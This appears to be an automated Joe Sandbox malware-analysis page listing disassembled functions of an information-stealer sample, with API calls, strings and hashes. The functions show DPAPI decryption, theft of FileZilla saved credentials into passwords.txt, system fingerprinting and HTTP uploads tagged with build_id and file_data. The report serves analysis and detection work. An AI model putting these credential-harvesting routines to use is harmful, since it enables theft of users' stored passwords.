Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: 46b068c7733666c018b39ff18f31075f850ddd96328a2cc1a4e8c768cc7d31d8
Instruction ID: 2e7275f5d5bb02ee0605afbe0be7da184bef8c6ff259302cdb69b57893898384
Opcode Fuzzy Hash: 46b068c7733666c018b39ff18f31075f850ddd96328a2cc1a4e8c768cc7d31d8
Instruction Fuzzy Hash: B10186316012249BD761DB609D44FEE77BD9F15301F4400E6A409E2291DA788A949B25

Function 004114A5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043673B,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Strings

|hC, xrefs: 00411553

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID: |hC
API String ID: 907984538-3764107683
Opcode ID: 9768a53111e9b41ec0021aeb321bf9d7444d06d6d4509de71c6fd8c63ab7e638
Instruction ID: bfa81b5141f0f611d38f96631b5a924622a5d7c7d2eb273204d7fd6412c8122d
Opcode Fuzzy Hash: 9768a53111e9b41ec0021aeb321bf9d7444d06d6d4509de71c6fd8c63ab7e638
Instruction Fuzzy Hash: EB118675A00214ABC721FB25DC86BEE73B9AB44704F440097B906A7291DB78AEC58B55

Function 00410D2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Strings

|hC, xrefs: 00410D86

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID: |hC
API String ID: 362916592-3764107683
Opcode ID: d3ba038e79c3d6452e582b194c40664996249e9fc254b0a3bc48853763265bda
Instruction ID: d786c9c2fac475e3ba6d0750242516987b6842aaa336c3da18de2be6a05c77cf
Opcode Fuzzy Hash: d3ba038e79c3d6452e582b194c40664996249e9fc254b0a3bc48853763265bda
Instruction Fuzzy Hash: 9CF02471600314ABD710EBB4AC49BAB336AAB04729F000256F102C62C0DA749E848B96

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 37476a7e07bd19321d3d7bbb25b0283a19e1dd82e76255f22c62bf42b388ff33
Instruction ID: 60d13eb9c103a75fa364b94b55101559deb990652134baedb893bb5dc28c3fb4
Opcode Fuzzy Hash: 37476a7e07bd19321d3d7bbb25b0283a19e1dd82e76255f22c62bf42b388ff33
Instruction Fuzzy Hash: 92011275A01218EFCB00DFA8D98489EBBB9FF48714F118066E906E7341D7719F41CB90

Function 00410FBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Strings

|hC, xrefs: 00410FF2

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID: |hC
API String ID: 2452939696-3764107683
Opcode ID: 52126808f140abcdd7487c8dc03b418a05d2c810c707b35085ed574c9394aab6
Instruction ID: 24bae56589eb72a372d61f4f6043ba1cbc83b7d2d1bdc529dd260f7cfeab3d40
Opcode Fuzzy Hash: 52126808f140abcdd7487c8dc03b418a05d2c810c707b35085ed574c9394aab6
Instruction Fuzzy Hash: 4DE092B0D1021D9BCB11DF60EC96ADEB7FDAF08604F4051B9A505D31C0DA70ABC98F44

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,0041849D), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,?,?,?,?,00412805,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,00412805,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,00412805,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697F,0043697E,0043697B), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437844,------,00437838,?,",0043782C,------,00437820,dea7c01007a657ba0c601c941632f140,",build_id,00437808,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

------, xrefs: 0040573C
", xrefs: 0040597B
------, xrefs: 00405605
ERROR, xrefs: 00405D79
build_id, xrefs: 0040594F
", xrefs: 00405C35
------, xrefs: 0040589D
dea7c01007a657ba0c601c941632f140, xrefs: 004059A7
", xrefs: 0040581B
", xrefs: 00405AD8
------, xrefs: 004059FF
--, xrefs: 00405600
ERROR, xrefs: 00405F2F
file_data, xrefs: 00405C09
block, xrefs: 00405E30
------, xrefs: 00405B5D

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$dea7c01007a657ba0c601c941632f140$file_data
API String ID: 2638065154-3981541687
Opcode ID: b77cfc64ba9740cd6e78d3f057f98bd0c8727ca3f58dd8f6598c3fcb95848e9c
Instruction ID: 53aa546b4b0cb151040799770203ffff5ac01f20d74cce1a20fb9c27d11006b5
Opcode Fuzzy Hash: b77cfc64ba9740cd6e78d3f057f98bd0c8727ca3f58dd8f6598c3fcb95848e9c
Instruction Fuzzy Hash: 8642E771D401699BDF21FB21DC45ACDB3B9BF04308F0185E6A548B3192DAB46FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,0041688A,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,0043691F,0043691E,0043691D,00436907), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

Strings

<Host>, xrefs: 0040E7D9
Host: , xrefs: 0040E954
<Pass encoding="base64">, xrefs: 0040E88A
passwords.txt, xrefs: 0040EA4D
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
Password: , xrefs: 0040E9AE
Login: , xrefs: 0040E98C
Soft: FileZilla, xrefs: 0040E948
<User>, xrefs: 0040E851
<Port>, xrefs: 0040E818

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: d0ac6a95de0b34932e2a327c981a4be56e90a7f6b6075dfc4e4220ecf871864b
Instruction ID: cce6baae49f0a400679edda4438216bca873cfeb52b9e3b5cda82fd9691ac21e
Opcode Fuzzy Hash: d0ac6a95de0b34932e2a327c981a4be56e90a7f6b6075dfc4e4220ecf871864b
Instruction Fuzzy Hash: 46A19472A00219ABCF10FBA1DD4BACD7775AF18309F105426F501F70E1DBB8AE458B99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,0043798C,------,00437980,",task_id,0043796C,------,00437960,",mode,0043794C,------,00437940), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 00406CFC
------, xrefs: 004073FF
task_id, xrefs: 00407351
", xrefs: 0040721D
", xrefs: 0040737D
", xrefs: 004070C1
status, xrefs: 004074B1
build_id, xrefs: 00407095
dea7c01007a657ba0c601c941632f140, xrefs: 004070ED
------, xrefs: 00406E82
mode, xrefs: 004071F1
", xrefs: 004074DD
------, xrefs: 00407145
------, xrefs: 0040729F
------, xrefs: 00406FE3
", xrefs: 00406F61

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
